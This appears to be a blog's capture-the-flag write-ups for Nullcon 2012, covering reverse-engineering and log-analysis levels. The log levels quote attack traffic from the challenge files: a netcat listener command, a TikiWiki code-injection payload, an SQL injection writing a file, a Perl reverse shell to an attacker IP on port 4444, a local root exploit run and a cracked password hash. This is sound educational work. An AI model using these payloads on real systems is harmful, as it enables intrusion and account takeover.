__errno_location() = 0x7fdc07b626a8
fprintf(0x7fdc0795e860, "%s%s%s: %s\n", "./script2", "", "", "has expired!\nSeems the Devils Lu"..../script2: has expired!
Seems the Devils Luck prevails yet. Use Time Machine to overcome it
) = 92
+++ exited (status 1) +++

main is at 0x400f99, running in gdb

some constants at the beginning
gdb$ x/s 0x602ce0
0x602ce0: "has expired!\nSeems the Devils Luck prevails yet. Use Time Machine to overcome it"
gdb$ x/s 0x6020c0
0x6020c0: "1326393000"

first check to bypass
if (_atoll("1326393000") < _time(0)) goto end
b *0x400ffd
some vars after memcpy()

0x6020cd: "/bin/sh"
0x6020d5: "-c"
0x602ccf: "exec '%s' \"$@\""
0x602cdf: ""
0x602d71: "location has changed!"
0x602d42: "location has changed!"
0x602d71: "location has changed!"
0x602d5d: "abnormal behavior!"

0x604170: "exec '/path/to/script2' \"$@\""
b *0x4010ed for some check results from 0x400f99

0x602d89: "" gdb
$ x/s 0x602280
0x602280: "#!/bin/sh\n", '#' ...
0x602cb9: "shell has changed!"
0x602d8b: "shell has changed!"

gdb$ dump binary memory dump.raw 0x602280 0x602d00

dump.raw is a shell script, and here the interesting part

       flagreq=0
if [ $flagreq -eq 1 ]
then
echo "Nature has neither kernel nor shell; she is everything at once"
fi


Flag: Nature has neither kernel nor shell; she is everything at once

Level 5: Got Dumped :(

$ file lol.dmp
lol.dmp: MDMP crash report data
Some information extracted using Visual Studio
Last Write Time: 08.01.2012 14:38:14
Process Name: Stub.exe : E:\Projects\Nullcon 2012\HackIM\RE2\Stub\Release\Stub.exe
OS Version: 5.1.2600

Modules:
Stub.exe E:\Projects\Nullcon 2012\HackIM\RE2\Stub\Release\Stub.exe 0.0.0.0
ntdll.dll C:\WINDOWS\system32\ntdll.dll 5.1.2600.5512
kernel32.dll C:\WINDOWS\system32\kernel32.dll 5.1.2600.5512
user32.dll C:\WINDOWS\system32\user32.dll 5.1.2600.5512
gdi32.dll C:\WINDOWS\system32\gdi32.dll 5.1.2600.5512

Stack:
> deadbabe()
Stub.exe!00401290()
[Frames below may be incorrect and/or missing, no symbols loaded for Stub.exe]
Stub.exe!00402921()
kernel32.dll!7c817067()

The AsmCode at 0x401000 before the crash
push    ebp
mov ebp, esp
push 0FFFFFFFEh
push offset dword_409598
push offset sub_402730
mov eax, large fs:0
push eax
sub esp, 24h
mov eax, dword_40A004
xor [ebp-8], eax
xor eax, ebp
mov [ebp-28], eax
push ebx
push esi
push edi
push eax
lea eax, [ebp-16]
mov large fs:0, eax
mov [ebp-24], esp
mov eax, dword_409270
mov [ebp-48], eax
mov ecx, dword_409274
mov [ebp-44], ecx
mov edx, dword_409278
mov [ebp-40], edx
mov eax, dword_40927C
mov [ebp-36], eax
mov cx, word_409280
mov [ebp-32], cx
mov dl, byte_409282
mov [ebp-30], dl
push 0DEADBABEh
retn

This function prepares the stack this way
deadbabe push deadbabe
e0442488 push eax - esp is pointing here
fffffffe push edi
00000000 push esi
00000001 push ebx
fffffffe unitialized value -2

bc9398a4 *(409270)
a184818f *(409274)
82839b8f *(409278)
0000978f *(40927C)
00000000 *(409280)2bytes + *(409282) 2bytes
e0442488 0x0E056DBB8 xor ebp (0x12FF30)
0012feec (esp)
e0164840 unitialized value 4093F8? // SEH is prepared here
0012ffb0 large fs:0 (pointer to next seh)
00402730 //Address to jump on exception like 0xdeadbabe
e0164e20 0x409598 xor 0x0E056DBB8 (*40A004) exception_handler_table
fffffffe

0012ffc0 saved ebp - ebp is pointing here
00401290 saved eip


After the crash the exception handler function @00402730 will be called.

The pushed value of A49893BC8F8184A18F9B83828F97 looked like an encrypted flag for me.

First of all i thought, the exception handler have to called and the flag will be decrypted and shown to the user.

If you scroll down a little you will notice this peace of code.

004010DA  /.  33F6          XOR ESI,ESI
...
004010F2 |> FE4435 D0 /INC BYTE PTR SS:[ESI+EBP-30]
...
00401106 |. 304435 D0 |XOR BYTE PTR SS:[ESI+EBP-30],AL
0040110A |. 46 |INC ESI
...
00401113 |.^ 7C DD \JL SHORT 004010F2
...
00401117 |. 68 84924000 PUSH OFFSET 00409284 ; Pointing to the string "Flag"



That looks like, that the flag is executed. Every Byte is XORed with another byte. I guessed that this is always the same byte, so i wrote a a simply bruteforcer in python.

flag = "A49893BC8F8184A18F9B83828F97"

for key in range(256):
out=""
for i in range(0,len(flag),2):
c = int(flag[i:i+2],16)+1
out += chr(c^key)
print out


The output was like
KwzS~lkL~rjm~v
Jv{RmjMsklw
UidM`ruR`lts`h
TheLastSamurai
WkfObpwPbnvqbj
VjgNcqvQcowpck
Qm`IdvqVdhpwdl


Flag: TheLastSamurai




For corrections and other feedback send me an e-mail to bashrc at intruded dot net

Dienstag, 17. Januar 2012

Nullcon 2012 Writeup on Log Analysis

The log analysis levels were straightforward, but maybe there are still some ppl, who are interested in the solution.

Level1 (Analysing the the Nikto report file)

You will notice fast, that there is a line containing the challenge path.
+ OSVDB-3268: GET /challenge/logically_insane/  : Directory indexing is enabled: /challenge/logically_insane/

After navigating to this folder, you will see a (fake) directory listing with askmelater.asp inside.

After navigating to this file and watching the directory listing, you get the hint "Ask the proper question to get the proper answer" and the parameter information askmelater.asp?question=?

Using flag as parameter you get the Flag: 6bb61e3b7bce0931da574d19d1d82c88 <-- this is generated, so your flag is maybe something else

Level2 (Analysing the the pcap file)

This was more about manually scrolling the packets in Wireshark and looking into the contents. After reaching paket number 28, you see response of a select and the password ..Supp@..adm1n, which is the flag.

Level3 (Analysing the the 25M access log)

Some web scanner flooded the logs, so you cannot look on it by scrolling.
What i've done is just looking at the question, we need the attacker ip, so i filtered all IPs first.

$ cat access.log | awk '{print $1}' | sort | uniq
127.0.0.1
192.168.0.105
192.168.0.107
192.168.0.110


Afterwards i filtered by IP and was hoping that the shortest log will have the answer.

$ cat access.log | grep 192.168.0.107
192.168.0.107 - - [] "GET /index.php HTTP/1.1" 200 1364
192.168.0.107 - - [] "GET /javascript/jquery.js HTTP/1.1"
192.168.0.107 - - [] "GET /javascript/common.js HTTP/1.1"
192.168.0.107 - - [] "GET /Contacts.php HTTP/1.1"
192.168.0.107 - - [] "GET /add-contact.php HTTP/1.1"
192.168.0.107 - - [] "GET /search.php HTTP/1.1"
192.168.0.107 - - [] "GET /search.php HTTP/1.1"
192.168.0.107 - - [06/Jan/2012:00:58:00 +0530] "GET /contact.php?c=bmMgLWwgLXAgNjY2Ng== HTTP/1.1" 500 274 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"


And truely, the answer is inside the shortest log.

base64decode("bmMgLWwgLXAgNjY2Ng==") == nc -l -p 6666

The attacker is coming from 192.168.0.107 and uses contact.php to start netcat on port 6666.

Level4 (Analysing the the Burp session log)

Unfortunately i don't have a full version of Burp, so i couldn't load the logfile into the application.

According to level3, i tried to identify the attacker first by sorting to a uniq attribute. I have randomly chosen the User-Agent for this.

$ cat burp.log | grep User-Agent | sort | uniq
User-Agent: Internet Explorer 6.0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:7.0.1) Gecko/20100101 Firefox/7.0.1


IE6 is running, so i thought, this could be a client side exploit. After manually looking into the file using VI, i recognized, that there is a command execution.

POST /tikiwiki/scripts/server.php HTTP/1.1^M
TE: deflate,gzip;q=0.3^M
Connection: TE, close^M
Host: 192.168.221.154^M
User-Agent: Internet Explorer 6.0^M
Content-Length: 360^M
^M
foo.bar1111','')); system('id
'); die; /*



I googled for "tikiwiki server.php code execution" and found the CVE number.
Flag: CVE-2005-1921

Level5 (Analysing the the 93M pcapng file)

We have to find 4 flags this time.
Flag-I: Vulnerable Parameter in 1st Attack
Flag-II: Vulnerable Parameter in 2nd Attack
Flag-III: Names of the people who discovered the Local Privilege Escalation Exploit used
Flag-IV: root Password


I startet with the last part, somebody uses local root exploits so there should be traces of this.

$ strings dump.pcapng | grep root
...
root:$1$IW2CPQzs$ba/aJ9zePc/r9tF2R6KAJ0:15350:0:99999:7:::
...
** Linux kernel 2.4/2.6 (32bit) sock_sendpage() local ring0 root exploit (simple ver)
ggcc 9479.c -o root
./root
uid=0(root) gid=0(root) groups=48(apache) context=system_u:system_r:httpd_sys_script_t
...


sock_sendpage() exploit can be found fast at exploit-db, in which you can see the line "Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team."

Flag3 is found, now search for the others.

Guessing it is a webexploit, i did a grep for "GET" and found the following lines.

GET /index.html?page=blog&title=Blog&id=2+AND+1=2+UNION+ALL+SELECT+1,'',3,4,5+INTO+OUTFILE '/tmp/test2.txt'--+- HTTP/1.1

GET /index.html?page=../../../../../../../../../tmp/test2.txt&c=perl -e 'use Socket;$i="192.168.221.130";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'


What can we see here?
The first request is an SQL-Injection writing the line "" into the file "/tmp/test2.txt"

The second request is using a directory traversal bug to execute the test2.txt file, which should execute the perl connect shell.

We see that the attacker has the IP 192.168.221.130 and listens on port 4444.

Our first flag is id and the second one is page.

I've loaded the pcapng file into wireshark and set the filter "ip.addr==192.168.221.130 && tcp.port==4444"

Here is the full shell log can be found here

I couldn't find the root password inside the network dump, so i started john.
$ john nullcon.tmp
Loaded 1 password hash (FreeBSD MD5 [32/64 X2])

After some time: zuzana




For corrections and other feedback send me an e-mail to bashrc at intruded dot net